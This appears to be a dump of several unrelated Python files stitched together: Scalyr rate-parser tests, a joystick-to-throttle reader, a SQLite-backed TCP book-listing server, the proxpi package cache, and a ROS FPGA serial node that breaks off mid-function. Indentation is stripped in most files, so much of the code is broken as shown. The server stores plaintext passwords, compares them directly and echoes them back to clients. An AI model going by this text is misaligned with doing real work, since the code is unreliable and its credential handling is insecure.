result.append((count, lower, upper))
return result
class TestParseValueWithRate(ScalyrTestCase):
def test_numerators(self):
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/s"))
self.assertEqual(100 * 1000, scalyr_util.parse_data_rate_string("100 kB/s"))
self.assertEqual(
100 * 1000 * 1000, scalyr_util.parse_data_rate_string("100 mB/s")
)
self.assertEqual(
100 * 1000 * 1000 * 1000, scalyr_util.parse_data_rate_string("100 gB/s")
)
self.assertEqual(
100 * 1000 * 1000 * 1000 * 1000,
scalyr_util.parse_data_rate_string("100 tB/s"),
)
self.assertEqual(100 * 1024, scalyr_util.parse_data_rate_string("100 kiB/s"))
self.assertEqual(
100 * 1024 * 1024, scalyr_util.parse_data_rate_string("100 miB/s")
)
self.assertEqual(
100 * 1024 * 1024 * 1024, scalyr_util.parse_data_rate_string("100 giB/s")
)
self.assertEqual(
100 * 1024 * 1024 * 1024 * 1024,
scalyr_util.parse_data_rate_string("100 tiB/s"),
)
def test_denominators(self):
self.assertEqual(100000, scalyr_util.parse_data_rate_string("100000 B/s"))
self.assertEqual(
100000 / 60.0, scalyr_util.parse_data_rate_string("100000 B/m")
)
self.assertEqual(
100000 / 60.0 / 60.0, scalyr_util.parse_data_rate_string("100000 B/h")
)
self.assertEqual(
100000 / 60.0 / 60.0 / 24.0,
scalyr_util.parse_data_rate_string("100000 B/d"),
)
self.assertEqual(
100000 / 60.0 / 60.0 / 24.0 / 7.0,
scalyr_util.parse_data_rate_string("100000 B/w"),
)
def test_spacing(self):
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1kiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1 kiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1\tkiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1 \t \t kiB/s"))
def test_capitalization(self):
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/S"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 b/S")
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/s"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 b/s")
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1KiB/S"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1kIB/S"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1KB/S"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1kB/S"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1Kb/S")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1kib/S")
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1KiB/s"))
self.assertEqual(1024, scalyr_util.parse_data_rate_string("1kIB/s"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1KB/s"))
self.assertEqual(1000, scalyr_util.parse_data_rate_string("1kB/s"))
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1Kb/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "1kb/s")
def test_values(self):
self.assertEqual(100, scalyr_util.parse_data_rate_string("100 B/s"))
self.assertEqual(-100, scalyr_util.parse_data_rate_string("-100 B/s"))
self.assertEqual(0, scalyr_util.parse_data_rate_string("0 B/s"))
self.assertEqual(0, scalyr_util.parse_data_rate_string("0 gB/s"))
self.assertEqual(0, scalyr_util.parse_data_rate_string("-0 gB/s"))
self.assertEqual(-100.2456, scalyr_util.parse_data_rate_string("-100.2456 B/s"))
self.assertEqual(
199.000001, scalyr_util.parse_data_rate_string("199.000001 B/s")
)
self.assertEqual(
1024 * 1024 * 1024 * 1024 / 60.0 / 60.0 / 24.0 / 7.0,
scalyr_util.parse_data_rate_string("1 tiB/w"),
)
def test_invalid_inputs(self):
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "B/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 /")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "- B/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 YB/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 B/C")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 D/s")
self.assertRaises(ValueError, scalyr_util.parse_data_rate_string, "100 g1/s")
manual_ctrl.py
#!/usr/bin/env python3
# set up wheel
import array
import os
import struct
from fcntl import ioctl
from typing import NoReturn
# Iterate over the joystick devices.
print('Available devices:')
for fn in os.listdir('/dev/input'):
if fn.startswith('js'):
print(f' /dev/input/{fn}')
# We'll store the states here.
axis_states = {}
button_states = {}
# These constants were borrowed from linux/input.h
axis_names = {
0x00 : 'x',
0x01 : 'y',
0x02 : 'z',
0x03 : 'rx',
0x04 : 'ry',
0x05 : 'rz',
  0x06 : 'throttle',
0x07 : 'rudder',
0x08 : 'wheel',
0x09 : 'gas',
0x0a : 'brake',
0x10 : 'hat0x',
0x11 : 'hat0y',
0x12 : 'hat1x',
0x13 : 'hat1y',
0x14 : 'hat2x',
0x15 : 'hat2y',
0x16 : 'hat3x',
0x17 : 'hat3y',
0x18 : 'pressure',
0x19 : 'distance',
0x1a : 'tilt_x',
0x1b : 'tilt_y',
0x1c : 'tool_width',
0x20 : 'volume',
0x28 : 'misc',
}
button_names = {
0x120 : 'trigger',
0x121 : 'thumb',
0x122 : 'thumb2',
0x123 : 'top',
0x124 : 'top2',
0x125 : 'pinkie',
0x126 : 'base',
0x127 : 'base2',
0x128 : 'base3',
0x129 : 'base4',
0x12a : 'base5',
0x12b : 'base6',
0x12f : 'dead',
0x130 : 'a',
0x131 : 'b',
0x132 : 'c',
0x133 : 'x',
0x134 : 'y',
0x135 : 'z',
0x136 : 'tl',
0x137 : 'tr',
0x138 : 'tl2',
0x139 : 'tr2',
0x13a : 'select',
0x13b : 'start',
0x13c : 'mode',
0x13d : 'thumbl',
0x13e : 'thumbr',
0x220 : 'dpad_up',
0x221 : 'dpad_down',
0x222 : 'dpad_left',
0x223 : 'dpad_right',
# XBox 360 controller uses these codes.
0x2c0 : 'dpad_left',
0x2c1 : 'dpad_right',
0x2c2 : 'dpad_up',
0x2c3 : 'dpad_down',
}
axis_map = []
button_map = []
def wheel_poll_thread(q: 'Queue[str]') -> NoReturn:
# Open the joystick device.
fn = '/dev/input/js0'
print(f'Opening {fn}...')
jsdev = open(fn, 'rb')
# Get the device name.
#buf = bytearray(63)
buf = array.array('B', [0] * 64)
ioctl(jsdev, 0x80006a13 + (0x10000 * len(buf)), buf) # JSIOCGNAME(len)
js_name = buf.tobytes().rstrip(b'\x00').decode('utf-8')
print(f'Device name: {js_name}')
# Get number of axes and buttons.
buf = array.array('B', [0])
ioctl(jsdev, 0x80016a11, buf) # JSIOCGAXES
num_axes = buf[0]
buf = array.array('B', [0])
ioctl(jsdev, 0x80016a12, buf) # JSIOCGBUTTONS
num_buttons = buf[0]
# Get the axis map.
buf = array.array('B', [0] * 0x40)
ioctl(jsdev, 0x80406a32, buf) # JSIOCGAXMAP
for _axis in buf[:num_axes]:
axis_name = axis_names.get(_axis, f'unknown(0x{_axis:02x})')
axis_map.append(axis_name)
axis_states[axis_name] = 0.0
# Get the button map.
buf = array.array('H', [0] * 200)
ioctl(jsdev, 0x80406a34, buf) # JSIOCGBTNMAP
for btn in buf[:num_buttons]:
btn_name = button_names.get(btn, f'unknown(0x{btn:03x})')
button_map.append(btn_name)
button_states[btn_name] = 0
print('%d axes found: %s' % (num_axes, ', '.join(axis_map)))
print('%d buttons found: %s' % (num_buttons, ', '.join(button_map)))
# Enable FF
import evdev # pylint: disable=import-error
from evdev import ecodes, InputDevice # pylint: disable=import-error
device = evdev.list_devices()[0]
evtdev = InputDevice(device)
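  # FF_AUTOCENTER strength ranges from 0 to 65535 in the Linux
  # force-feedback API; 24000 gives a moderate centering force.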
val = 24000
evtdev.write(ecodes.EV_FF, ecodes.FF_AUTOCENTER, val)
while True:
evbuf = jsdev.read(8)
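    # Each event is an 8-byte struct js_event from <linux/joystick.h>:
    # __u32 time (ms), __s16 value, __u8 type, __u8 number; '4xhBB'
    # skips the timestamp and unpacks the remaining three fields.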
value, mtype, number = struct.unpack('4xhBB', evbuf)
# print(mtype, number, value)
if mtype & 0x02: # wheel & paddles
axis = axis_map[number]
if axis == "z": # gas
fvalue = value / 32767.0
axis_states[axis] = fvalue
normalized = (1 - fvalue) * 50
q.put(f"throttle_{normalized:f}")
elif axis == "rz": # brake
fvalue = value / 32767.0
axis_states[axis] = fvalue
normalized = (1 - fvalue) * 50
q.put(f"brake_{normalized:f}")
elif axis == "x": # steer angle
fvalue = value / 32767.0
axis_states[axis] = fvalue
normalized = fvalue
q.put(f"steer_{normalized:f}")
elif mtype & 0x01: # buttons
if value == 1: # press down
if number in [0, 19]: # X
q.put("cruise_down")
elif number in [3, 18]: # triangle
q.put("cruise_up")
elif number in [1, 6]: # square
q.put("cruise_cancel")
elif number in [10, 21]: # R3
q.put("reverse_switch")
if __name__ == '__main__':
from multiprocessing import Process, Queue
  q: 'Queue[str]' = Queue()  # quoted: multiprocessing.Queue is a factory function, not subscriptable
p = Process(target=wheel_poll_thread, args=(q,))
p.start()
server.py
import sqlite3
import socket
import sys
import threading
import json
conn_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_addr = ('127.0.0.1', 8888)
is_finished = [False]
ban_list = list()
def thread_tcp():
    conn_tcp.bind(server_addr)
    conn_tcp.listen()
    while not is_finished[0]:
        try:
            conn, addr = conn_tcp.accept()
        except OSError as e:
            # accept() failed before a client address was available,
            # so there is nothing to ban here.
            print('Accept failed:', e)
            continue
        if addr in ban_list:
            print('Ban connection', addr)
            conn.close()
        else:
            print('Get connection', addr)
            t = threading.Thread(target=thread_connection, args=(conn, addr))
            t.start()
def thread_connection(client_socket, client_addr):
    try:
        while True:
            raw = client_socket.recv(2048)
            if not raw:
                break
            # recv(2048) returns at most 2048 bytes; measure the payload
            # with len() (sys.getsizeof() counts Python object overhead,
            # not message size).
            if len(raw) >= 2048:
                print('Message too large from', client_addr)
                client_socket.close()
                return
            data = raw.decode()
            print('GET FROM', client_addr, data, len(raw), 'bytes')
            data = data_menu(data, client_addr)
            print('SEND TO', client_addr, data)
            client_socket.sendall(data.encode())
    except Exception:
        print('Connection lost', client_addr)
        ban_list.append(client_addr)
    finally:
        client_socket.close()
def data_menu(data: str, addr) -> str:
conn_sql = sqlite3.connect('new.db')
cursor = conn_sql.cursor()
    try:
        data = json.loads(data)
    except ValueError:
        data = ['bad request']
    if not isinstance(data, list) or not data:
        data = ['bad request']
    if data[0] == 'in':
res = cursor.execute(' SELECT name, password, role FROM users WHERE name = ? and password = ?', (data[1], data[2],)).fetchone()
if res is not None:
data = [[res[0], res[1], res[2]], get_posts(cursor, conn_sql)]
if res[2] == 2:
data.append(get_users(cursor))
else:
data = ['wrong input']
elif data[0] == 'up':
if cursor.execute(' SELECT COUNT(*) FROM users WHERE name = ? ', (data[1],)).fetchone()[0] == 0:
cursor.execute(' INSERT INTO users(name, password, role) VALUES (?, ?, 1)', (data[1], data[2],))
data = [[data[1], data[2], 1], get_posts(cursor, conn_sql)]
else:
data = ['already exist']
elif data[0] == 'books':
data = get_posts(cursor, conn_sql)
elif data[0] == 'users':
res = cursor.execute(' SELECT role FROM users WHERE name = ? and password = ? ', (data[1], data[2],)).fetchone()
if res is not None and res[0] == 2:
data = get_users(cursor)
else:
data = ['permission denied']
elif data[0] == 'create book':
res = cursor.execute(' SELECT id FROM users WHERE name = ? and password = ? ', (data[1], data[2],)).fetchone()
if res is not None:
cursor.execute(' INSERT INTO posts(id_users, name, category, author, price, telephone) VALUES(?, ?, ?, ?, ?, ?) ', (res[0], data[3], data[4], data[5], data[6], data[7],))
data = ['create book', data[3]]
else:
data = ['no create book']
elif data[0] == 'delete book':
if cursor.execute(' SELECT role FROM users WHERE name = ? and password = ? ', (data[1], data[2],)).fetchone()[0] == 2:
cursor.execute(' DELETE FROM posts WHERE id = ? ', (data[3], ))
data = ['delete book', data[3]]
else:
res = cursor.execute(' SELECT id_users FROM posts WHERE id = ? ', (data[3],)).fetchone()[0]
if cursor.execute(' SELECT COUNT(*) FROM users WHERE name = ? and password = ? and id = ? ', (data[1], data[2], res,)).fetchone()[0] == 1:
cursor.execute(' DELETE FROM posts WHERE id = ? ', (data[3],))
data = ['delete book', data[3]]
else:
data = ['no delete book', data[3]]
elif data[0] == 'update role':
res = cursor.execute(' SELECT id, role FROM users WHERE name = ? and password = ? ', (data[1], data[2],)).fetchone()
if res is not None:
if str(res[0]) != str(data[3]) and res[1] == 2:
role = cursor.execute(' SELECT role FROM users WHERE id = ? ', (data[3],)).fetchone()[0]
role = 1 if role == 2 else 2
cursor.execute(' UPDATE users SET role = ? WHERE id = ? ', (role, data[3],))
data = ['update role']
else:
data = ['no update role', data[3]]
else:
data = ['no update role', data[3]]
cursor.close()
conn_sql.commit()
conn_sql.close()
return json.dumps(data)
def get_posts(cur, conn) -> list:
posts = list()
for row in cur.execute(" SELECT id, name, category, author, price, telephone, id_users FROM posts "):
row = list(row)
cursor_user = conn.cursor()
        user_name = cursor_user.execute(" SELECT name FROM users WHERE id = ? ", (row[-1],)).fetchone()[0]
cursor_user.close()
row[-1] = user_name
posts.append(row)
return posts
def get_users(cur) -> list:
users = list()
for row in cur.execute(" SELECT id, name, role FROM users "):
users.append(list(row))
return users
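# A minimal client sketch for the JSON list protocol handled by
# data_menu above (the credentials here are hypothetical):
def demo_client():
    with socket.create_connection(server_addr) as s:
        s.sendall(json.dumps(['in', 'alice', 'secret']).encode())
        print(json.loads(s.recv(2048).decode()))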
if __name__ == '__main__':
t_server = threading.Thread(target=thread_tcp)
t_server.start()
t_server.join()
_cache.py
"""Package index interfacing and caching."""
import io
import os
import re
import time
import shutil
import logging
import tempfile
import threading
import collections
import typing as t
from urllib import parse as urllib_parse
import requests
from lxml import etree as lxml_etree
INDEX_URL = os.environ.get("PROXPI_INDEX_URL", "https://pypi.org/simple/")
EXTRA_INDEX_URLS = os.environ.get("PROXPI_EXTRA_INDEX_URLS", "").strip().split(",")
EXTRA_INDEX_URLS = [s for s in EXTRA_INDEX_URLS if s]
INDEX_TTL = int(os.environ.get("PROXPI_INDEX_TTL", 1800))
EXTRA_INDEX_TTLS = os.environ.get("PROXPI_EXTRA_INDEX_TTL", "").strip().split(",")
EXTRA_INDEX_TTLS = [s for s in EXTRA_INDEX_TTLS if s]
EXTRA_INDEX_TTLS = [int(s) for s in EXTRA_INDEX_TTLS] or [180] * len(EXTRA_INDEX_URLS)
CACHE_SIZE = int(os.environ.get("PROXPI_CACHE_SIZE", 5368709120))
logger = logging.getLogger(__name__)
_name_normalise_re = re.compile("[-_.]+")
_html_parser = lxml_etree.HTMLParser()
File = collections.namedtuple("File", ("name", "url", "fragment", "attributes"))
class NotFound(ValueError):
"""Package or file not found."""
pass
class Thread(threading.Thread):
"""Exception-storing thread runner."""
exc = None
def run(self):
try:
super().run()
except Exception as e:
self.exc = e
raise
def join(self, timeout=None):
super().join(timeout)
if self.exc:
raise self.exc
class _Locks:
def __init__(self):
self._lock = threading.Lock()
self._locks = {}
def __getitem__(self, k: str) -> threading.Lock:
if k not in self._locks:
with self._lock:
if k not in self._locks:
self._locks[k] = threading.Lock()
return self._locks[k]
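# _Locks uses double-checked locking: the unlocked membership test is a
# fast path, and the re-check under the lock stops two racing threads
# from each creating a lock for the same key.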
def _mask_password(url: str) -> str:
"""Mask HTTP basic auth password in URL.
Args:
url: URL to process
Returns:
URL with password masked (or original URL if it has no password)
"""
parsed = urllib_parse.urlsplit(url)
if not parsed.password:
return url
netloc = f"{parsed.username}:****@" + parsed.hostname
if parsed.port is not None:
netloc += f":{parsed.port}"
parsed = parsed._replace(netloc=netloc)
return urllib_parse.urlunsplit(parsed)
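# Example (hypothetical URL):
#   _mask_password("https://user:hunter2@pypi.example.com/simple/")
#   -> "https://user:****@pypi.example.com/simple/"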
class _IndexCache:
"""Cache for an index.
Args:
index_url: index URL
ttl: cache time-to-live
"""
def __init__(self, index_url: str, ttl: int):
self.index_url = index_url
self.ttl = ttl
self._index_t = None
self._packages_t = {}
self._index_lock = threading.Lock()
self._package_locks = _Locks()
self._index = {}
self._packages = {}
self._index_url_masked = _mask_password(index_url)
def __repr__(self):
return f"{self.__class__.__name__}({self._index_url_masked!r}, {self.ttl!r})"
def _list_packages(self):
"""List packages using or updating cache."""
if self._index_t is not None and (time.monotonic() - self._index_t) < self.ttl:
return
logger.info(f"Listing packages in index '{self._index_url_masked}'")
response = requests.get(self.index_url)
tree = lxml_etree.parse(io.BytesIO(response.content), _html_parser)
self._index_t = time.monotonic()
root = tree.getroot()
body = next(b for b in root if b.tag == "body")
for child in body:
if child.tag == "a":
name = _name_normalise_re.sub("-", child.text).lower()
self._index[name] = child.attrib["href"]
def list_packages(self) -> t.Iterable[str]:
"""List packages.
Returns:
names of packages in index
"""
with self._index_lock:
self._list_packages()
return tuple(self._index)
def _list_files(self, package_name: str):
"""List package files using or updating cache."""
packages_t = self._packages_t.get(package_name)
if packages_t is not None and (time.monotonic() - packages_t) < self.ttl:
return
with self._index_lock:
self._list_packages()
if package_name not in self._index:
raise NotFound(package_name)
logger.debug(f"Listing files in package '{package_name}'")
package_url = self._index[package_name]
url = urllib_parse.urljoin(self.index_url, package_url)
response = requests.get(url)
self._packages_t[package_name] = time.monotonic()
tree = lxml_etree.parse(io.BytesIO(response.content), _html_parser)
root = tree.getroot()
body = next(b for b in root if b.tag == "body")
self._packages.setdefault(package_name, {})
for child in body:
if child.tag == "a":
name = child.text
url = child.attrib["href"]
attributes = {k: v for k, v in child.attrib.items() if k != "href"}
fragment = urllib_parse.urlsplit(url).fragment
self._packages[package_name][name] = File(
name, url, fragment, attributes
)
def list_files(self, package_name: str) -> t.Iterable[File]:
"""List package files.
Args:
package_name: name of package to list files of
Returns:
files of package
Raises:
NotFound: if package doesn't exist in index
"""
with self._package_locks[package_name]:
self._list_files(package_name)
return tuple(self._packages[package_name].values())
def get_file_url(self, package_name: str, file_name: str) -> str:
"""Get a file.
Args:
package_name: package of file to get
file_name: name of file to get
Returns:
local file path, or original file URL if not yet available
Raises:
NotFound: if package doesn't exist in index or file doesn't
exist in package
"""
with self._package_locks[package_name]:
self._list_files(package_name)
if file_name not in self._packages[package_name]:
raise NotFound(file_name)
return self._packages[package_name][file_name].url
def invalidate_list(self):
"""Invalidate package list cache."""
if self._index_lock.locked():
logger.info("Index already undergoing update")
return
self._index_t = None
self._index = {}
def invalidate_package(self, package_name: str):
"""Invalidate package file list cache.
Args:
package_name: package name
"""
if self._package_locks[package_name].locked():
logger.info(f"Package '{package_name}' files already undergoing update")
return
self._packages_t.pop(package_name, None)
self._packages.pop(package_name, None)
class _CachedFile:
__slots__ = ("path", "size", "n_hits")
def __init__(self, path, size, n_hits):
self.path = path
self.size = size
self.n_hits = n_hits
class _FileCache:
def __init__(self, max_size):
self.max_size = max_size
self._package_dir = tempfile.mkdtemp()
self._files = {}
def __repr__(self):
return f"{self.__class__.__name__}({self.max_size!r})"
def __del__(self):
if os.path.isdir(self._package_dir):
logger.debug(f"Deleting '{self._package_dir}'")
shutil.rmtree(self._package_dir)
def _download_file(self, url: str, path: str):
"""Download a file.
Args:
url: URL of file to download
path: local path to download to
"""
url_masked = _mask_password(url)
logger.debug(f"Downloading '{url_masked}' to '{path}'")
response = requests.get(url, stream=True)
if response.status_code // 100 >= 4:
logger.error(
f"Failed to download '{url_masked}': "
f"status={response.status_code}, body={response.text}"
)
return
parent, _ = os.path.split(path)
os.makedirs(parent, exist_ok=True)
with open(path, "wb") as f:
for chunk in response.iter_content(None):
f.write(chunk)
self._files[url] = _CachedFile(path, os.stat(path).st_size, 0)
def _wait_for_existing_download(self, url: str) -> t.Union[str, None]:
"""Wait 0.9s for existing download."""
file = self._files.get(url)
if isinstance(file, Thread):
try:
file.join(0.9)
except Exception as e:
if file.exc and file == self._files[url]:
self._files.pop(url, None)
url_masked = _mask_password(url)
logger.error(f"Failed to download '{url_masked}'", exc_info=e)
return url
if isinstance(self._files[url], Thread):
return url # default to original URL
return None
def _get_cached(self, url: str) -> t.Union[str, None]:
"""Get file from cache."""
if url in self._files:
file = self._files[url]
file.n_hits += 1
return file.path
return None
def _start_downloading(self, url: str):
"""Start downloading a file."""
path = urllib_parse.urlsplit(url).path
path = os.path.join(self._package_dir, path.lstrip("/"))
thread = Thread(target=self._download_file, args=(url, path))
self._files[url] = thread
thread.start()
def _evict_lfu(self, url: str):
"""Evict least-frequently-used files until under max cache size."""
response = requests.head(url)
file_size = int(response.headers.get("Content-Length", 0))
        existing_urls = sorted(
            (u for u in self._files if isinstance(self._files[u], _CachedFile)),
            key=lambda k: self._files[k].n_hits,
        )
existing_size = sum(self._files[k].size for k in existing_urls)
while existing_size + file_size > self.max_size and existing_size > 0:
existing_url = existing_urls.pop(0)
file = self._files.pop(existing_url)
os.unlink(file.path)
existing_size -= file.size
def get(self, url: str) -> str:
"""Get a file using or updating cache.
Args:
url: original file URL
Returns:
local file path, or original file URL if not yet available
"""
if self.max_size == 0:
return url
path = self._wait_for_existing_download(url)
if not path:
path = self._get_cached(url)
if not path:
self._start_downloading(url)
self._evict_lfu(url)
path = self.get(url)
return path
class Cache:
"""Package index cache.
Args:
root_cache: root index cache
file_cache: downloaded package file cache
extra_caches: extra indices' caches
"""
_index_cache_cls = _IndexCache
_file_cache_cls = _FileCache
def __init__(
self,
root_cache: _IndexCache,
file_cache: _FileCache,
extra_caches: t.List[_IndexCache] = None,
):
self.root_cache = root_cache
self.file_cache = file_cache
self.extra_caches = extra_caches or []
self._packages = {}
self._list_dt = None
self._package_list_dt = {}
def __repr__(self):
return (
f"{self.__class__.__name__}({self.root_cache!r}, {self.file_cache!r}, "
f"{self.extra_caches!r})"
)
@classmethod
def from_config(cls):
"""Create cache from configuration."""
root_cache = cls._index_cache_cls(INDEX_URL, INDEX_TTL)
file_cache = cls._file_cache_cls(CACHE_SIZE)
assert len(EXTRA_INDEX_URLS) == len(EXTRA_INDEX_TTLS)
extra_caches = [
cls._index_cache_cls(url, ttl)
for url, ttl in zip(EXTRA_INDEX_URLS, EXTRA_INDEX_TTLS)
]
return cls(root_cache, file_cache, extra_caches=extra_caches)
def list_packages(self) -> t.Iterable[str]:
"""List all packages.
Returns:
names of all discovered packages
"""
packages = set(self.root_cache.list_packages())
for cache in self.extra_caches:
packages.update(cache.list_packages())
return sorted(packages)
def list_files(self, package_name: str) -> t.Iterable[File]:
"""List package files.
Args:
package_name: name of package to list files of
Returns:
files of package
Raises:
NotFound: if package doesn't exist in any index
"""
files = []
try:
root_files = self.root_cache.list_files(package_name)
except NotFound as e:
exc = e
else:
files.extend(root_files)
for cache in self.extra_caches:
try:
extra_files = cache.list_files(package_name)
except NotFound:
continue
for file in extra_files:
if file.name not in {f.name for f in files}:
files.append(file)
if not files:
raise exc
return files
def get_file(self, package_name: str, file_name: str) -> str:
"""Get a file.
Args:
package_name: package of file to get
file_name: name of file to get
Returns:
local file path, or original file URL if not yet available
Raises:
NotFound: if package doesn't exist in any index or file doesn't
exist in package
"""
        try:
            url = self.root_cache.get_file_url(package_name, file_name)
        except NotFound as e:
            url = e
        if isinstance(url, Exception):
            for cache in self.extra_caches:
                try:
                    url = cache.get_file_url(package_name, file_name)
                    # stop at the first extra index that has the file
                    break
                except NotFound:
                    continue
        if isinstance(url, Exception):
            raise url
return self.file_cache.get(url)
def invalidate_list(self):
"""Invalidate package list cache."""
logger.info("Invalidating package list cache.")
self.root_cache.invalidate_list()
for cache in self.extra_caches:
cache.invalidate_list()
def invalidate_package(self, package_name: str):
"""Invalidate package file list cache.
Args:
package_name: package name
"""
logger.info(f"Invalidating package '{package_name}' file list cache.")
self.root_cache.invalidate_package(package_name)
for cache in self.extra_caches:
cache.invalidate_package(package_name)
|
node_fpga.py
|
#!/usr/bin/env python
import rospy
from master_msgs.msg import traction_Orders, connection, arm_Orders, rpm, current,pots,sensibility,PID
from master_msgs.srv import service_enable
import serial
import threading
import time
import numpy as np
# Global variables
global latitude, longitude, azimuth, lineal_speed, steering_speed
global L0_speed, L1_speed, L2_speed, R0_speed, R1_speed, R2_speed
global L0_current, L1_current, L2_current, R0_current, R1_current, R2_current
global rover_temp, bat0, bat1, bat2, bat3
global joint0, joint1, joint2, joint3, joint4, joint5, joint6
ultimo_izquierdo = 999  # 999 acts as an "unset" sentinel for the last commanded RPMs
ultimo_derecho = 999
EnviarMensaje = True  # initialization flag
almacenar = True
almacenar2 = True
start_motor = 0
SEPARADOR_POSITIVO = "#"
SEPARADOR_NEGATIVO = "!"
inicio_rec = False  # flag to start the FPGA value-receiving thread
### Messages of the different types for the topics to publish ###
rpm_present = rpm()
current_present = current()
pots_present = pots()
traction_present = traction_Orders()
arm_present = arm_Orders()
PID_present = PID()
serOpen = 0  # serial-port-open flag (0/1)
# Serial connection to the FPGA
try:
    print(' ')
    namePort = '/dev/ttyTHS2'
    print("Trying to open serial port:", namePort)
    ser = serial.Serial(port=namePort, baudrate=115200)
    serOpen = 1
    print("Serial port correct. serOpen", str(serOpen))
    print(' ')
except Exception:
    print("ERROR: Error opening serial port. serOpen=", str(serOpen))
finally:
    print(' ')
# MUX pin on the FPGA
### MAIN NODE ###
def node_fpga():
    global pub_RPM, pub_Current, pub_Pots, pub_PID, inicio_rec, start_motor
    # node creation
    rospy.init_node('node_fpga', anonymous=True)
    # subscribe to the traction orders topic
    rospy.Subscriber('topic_traction_orders', traction_Orders, traction_Orders_Callback)
    # subscribe to the connection topic
    # rospy.Subscriber('topic_connection', connection, connection_Callback)
    # subscribe to the arm orders topic
    rospy.Subscriber('topic_arm_orders', arm_Orders, arm_Orders_Callback)
    # publish on RPM, Current, POTS and PID
    pub_RPM = rospy.Publisher('topic_rpm', rpm, queue_size=10)
    pub_Current = rospy.Publisher('topic_current', current, queue_size=10)
    pub_Pots = rospy.Publisher('topic_pots', pots, queue_size=10)
    pub_PID = rospy.Publisher('topic_PID', PID, queue_size=10)
    threading.Thread(target=enviarMensajeInicializacion).start()
    threading.Thread(target=StartServerFPGA).start()
    enable = rospy.Service('service_enable', service_enable, handle_enable)
    rate = rospy.Rate(10)
    while not rospy.is_shutdown():
        rate.sleep()
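# Thread layout as wired above: the main thread only spins the 10 Hz ROS rate
# loop; enviarMensajeInicializacion sends the initialization frames a few
# times, and StartServerFPGA owns the serial read loop and all telemetry
# publishing.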
def enviarMensajeInicializacion():
    print('initializing...')
    global EnviarMensaje
    contador = 0
    while EnviarMensaje:
        nMsg = 1  # 3
        if serOpen:
            WriteFPGA("A" + str(nMsg) + "#I0#I1#I2#I3#I4#I5#")
        time.sleep(1)
        contador = contador + 1
        if contador > 4:
            EnviarMensaje = False
### TOPIC CALLBACKS ###
def traction_Orders_Callback(param):
    print('Sending traction instructions...')
    global traction_present
    traction_present = param
    procesarJoystick(traction_present.rpm_l, traction_present.rpm_r)
#def connection_Callback(param):
# pass
def arm_Orders_Callback(param):
    global arm_present
    global serOpen
    arm_present = param.message
    if serOpen:
        almacenar = WriteFPGA(arm_present)
def handle_enable(param):
    print('enable service')
    mensage = param.message
    if serOpen:
        almacenar2 = WriteFPGA(mensage)
    return []
### METHODS EXTERNAL TO ROS ###
def procesarJoystick(RPM_I, RPM_D):
    global EnviarMensaje, ultimo_izquierdo, ultimo_derecho
    print('Processing joystick')
(calc_RPM_izq, calc_RPM_der) = (int(RPM_I), int(RPM_D))
StringIzquierda = ("L" + str(calc_RPM_izq) + SEPARADOR_NEGATIVO) if (calc_RPM_izq >= 0) else (
"L" + str(-calc_RPM_izq) + SEPARADOR_POSITIVO)
StringDerecha = ("R" + str(calc_RPM_der) + SEPARADOR_NEGATIVO) if (calc_RPM_der >= 0) else (
"R" + str(-calc_RPM_der) + SEPARADOR_POSITIVO)
MensajeSeguridadMotores = ""
if np.sign(ultimo_izquierdo) != np.sign(calc_RPM_izq) and calc_RPM_izq != 0 and np.sign(ultimo_izquierdo) != 0:
MensajeSeguridadMotores += "L0#"
if np.sign(ultimo_derecho) != np.sign(calc_RPM_der) and calc_RPM_der != 0 and np.sign(ultimo_derecho) != 0:
MensajeSeguridadMotores += "R0#"
if np.abs(ultimo_izquierdo - calc_RPM_izq) > 0.1 or np.abs(ultimo_derecho - calc_RPM_der) > 0.1 or (
calc_RPM_der == 0 and ultimo_derecho != 0) or (calc_RPM_izq == 0 and ultimo_izquierdo != 0):
if serOpen:
EnviarMensaje=not WriteFPGA(MensajeSeguridadMotores + StringIzquierda + StringDerecha)
ultimo_izquierdo = calc_RPM_izq
ultimo_derecho = calc_RPM_der
# Reception of data from the base to the RPi and forwarding to the FPGA, MUX handling
def WriteFPGA(rcv):
    print('write:', rcv)
    # ser.write(rcv.encode())  # serial write disabled; currently only logs the frame
    return True
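# Wire-protocol sketch, inferred from the handlers in this file (not a formal
# spec): outgoing traction frames are "L<rpm>" / "R<rpm>" terminated by '#'
# or '!' depending on sign, optionally preceded by "L0#"/"R0#" safety stops on
# a direction change; incoming frames are "<letter><4 digits>" terminated by
# '#' or '!', where the letter selects the field (A-F motor currents, G-M arm
# joint potentiometers, N-S wheel speeds, X triggers a PID publish).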
### METHODS FOR RECEIVING INFORMATION OVER SERIAL ###
# Receive data from the FPGA over serial
def StartServerFPGA():
    global L0_speed, L1_speed, L2_speed, R0_speed, R1_speed, R2_speed
    global L0_current, L1_current, L2_current, R0_current, R1_current, R2_current
    global joint0, joint1, joint2, joint3, joint4, joint5, joint6
    global pub_RPM, pub_Current, pub_Pots, pub_PID, rpm_present, current_present, pots_present, PID_present
    print('Server FPGA start.')
    line = ""
    while not rospy.is_shutdown():
        try:
            received = ser.read()
            line += received.decode()
